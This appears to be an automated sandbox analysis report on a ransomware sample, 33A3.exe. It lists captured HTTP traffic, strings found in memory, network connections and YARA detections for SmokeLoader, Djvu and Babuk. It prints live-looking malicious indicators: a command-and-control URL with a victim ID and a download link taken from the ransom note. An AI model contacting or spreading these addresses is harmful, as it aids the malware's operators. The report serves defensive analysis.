20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 72 61 64 2d 65 69 6e 6d 79 75 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at trad-einmyus.com Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 37 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 98 d6 08 5e 39 5c a2 f3 df fc fc 48 eb 0b db 69 f9 53 47 91 0d 0a 30 0d 0a 0d 0a Data Ascii: 27I:82O^9\HiSG0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 47 a4 e8 dd e1 e4 40 f0 4f 91 64 b2 45 48 95 01 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:G@OdEH10
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 93 54 06 65 01 f6 a3 9e fc ab 15 b0 08 db 6f a7 18 5c 9b 08 bf eb 3b af 2d 50 0a f3 dd c6 5b ee 52 c6 41 83 aa 76 d2 26 eb b2 c7 18 7e 0d 0a 30 0d 0a 0d 0a Data Ascii: 41I:82OTeo\;-P[RAv&~0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 33 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 de 15 49 39 41 a3 e8 dd e1 f8 5f f5 4a 89 2d bb 53 51 90 4a fb ef 2c f3 2b 42 1a ae b7 d9 57 e8 0d 0a 30 0d 0a 0d 0a Data Ascii: 34I:82OI9A_J-SQJ,+BW0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.2Date: Fri, 24 May 2024 15:39:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 63 31 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 bc 53 da 46 d4 f7 20 86 24 e6 ad 90 52 23 e5 b4 4c 2b f8 a5 b4 6a f6 99 bc 5d af 72 94 cb 32 45 5d 39 0f 4e df a1 3d fd d4 55 84 ac c8 42 c6 36 9d 95 69 77 64 f9 7a 3a 9c c6 9d c6 76 ed 39 08 84 5a b0 4d e3 e6 d3 36 81 c7 fc 3f d7 38 f9 fb 91 e0 01 83 c4 c3 4c 1c c3 03 ae eb b4 c0 a9 ac 4f 1c ff 74 88 d8 29 82 7b 32 45 b6 88 f9 b7 ae 1a b1 4b 64 c0 c6 ba e2 d9 ba 78 d6 27 35 60 3a 6a e8 81 03 9d 78 ab a8 af 2d 90 d6 d7 44 0d 0a 30 0d 0a 0d 0a Data Ascii: c1I:82OB%,YR("XSF $R#L+j]r2E]9N=UB6iwdz:v9ZM6?8LOt){2EKdx'5`:jx-D0

Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54-D
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54KS
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54L
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.php?pid=903E7F261711F85395E5CEFBF4173C54e
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cajgtus.com/test1/get.phpw
Source: explorer.exe, 00000002.00000000.2046328419.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 33A3.exe, 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2049221866.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2048376120.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2048773161.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2048794646.0000000008890000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: 33A3.exe, 00000010.00000003.2557600248.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000002.00000000.2051763871.000000000C8E8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 33A3.exe, 00000010.00000003.2558316744.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/
Source: 33A3.exe, 00000010.00000003.2558504781.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.live.com/
Source: 33A3.exe, 00000010.00000003.2558685731.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.nytimes.com/
Source: 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 33A3.exe, 00000010.00000003.2558807456.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.reddit.com/
Source: 33A3.exe, 00000010.00000003.2558921582.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.twitter.com/
Source: 33A3.exe, 00000010.00000003.2559017569.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.wikipedia.com/
Source: 33A3.exe, 00000010.00000003.2559114058.0000000003420000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000002.00000000.2051021521.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2047730753.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: 33A3.exe, 00000009.00000002.2422986001.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.0000000000650000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629615392.000000000061A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2628287801.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/
Source: 33A3.exe, 00000009.00000002.2422986001.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/6
Source: 33A3.exe, 00000017.00000002.2543892568.000000000074A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/gK
Source: 33A3.exe, 33A3.exe, 0000000E.00000002.2443241260.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.000000000074A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629615392.000000000061A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2628287801.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json5
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.json7
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonM
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonW
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonat
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsondll
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsondll7
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsoniu
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsoni~
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonn~
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsonq
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/q
Source: 33A3.exe, 0000001A.00000002.2629615392.000000000061A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2628287801.000000000061A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/s
Source: 33A3.exe, 00000017.00000002.2543892568.000000000074A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.2ip.ua/sK
Source: explorer.exe, 00000002.00000000.2049221866.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3016685180.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3007904273.00000000085A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001E.00000003.3009500853.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3016685180.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3007904273.00000000085A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/)
Source: explorer.exe, 0000001E.00000003.3013299726.00000000085E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000001E.00000003.3004817424.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.0000000008423000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.2047025434.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 0000001E.00000003.3029743671.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000001E.00000003.3016685180.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3007904273.0000000008636000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comQkL
Source: explorer.exe, 00000002.00000000.2051021521.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: 33A3.exe, 00000010.00000002.3253450343.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp, _readme.txt0.16.dr, _readme.txt.16.dr	String found in binary or memory: https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73
Source: explorer.exe, 00000002.00000000.2049221866.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2049221866.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50438
Source: unknown	Network traffic detected: HTTP traffic on port 50470 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50441 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50442 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50461
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50441
Source: unknown	Network traffic detected: HTTP traffic on port 50461 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50474
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50451
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50454
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50431
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50442
Source: unknown	Network traffic detected: HTTP traffic on port 50454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50470
Source: unknown	Network traffic detected: HTTP traffic on port 50431 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50451 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50474 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50438 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50431 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50438 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50441 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.5:50442 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50451 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.5:50454 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50461 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:50470 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:50474 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to record screenshots

Source: C:\Users\user\AppData\Local\Temp\33A3.exe

9_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

Found ransom note / readme

Source: C:\Users\user\AppData\Local\VirtualStore\_readme.txt

Jump to dropped file

Yara detected Babuk Ransomware

Source: Yara match

File source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR

Yara detected Djvu Ransomware

Source: Yara match	File source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 4400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 3556, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 3780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 5964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 5328, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 2284, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 33A3.exe PID: 5560, type: MEMORYSTR
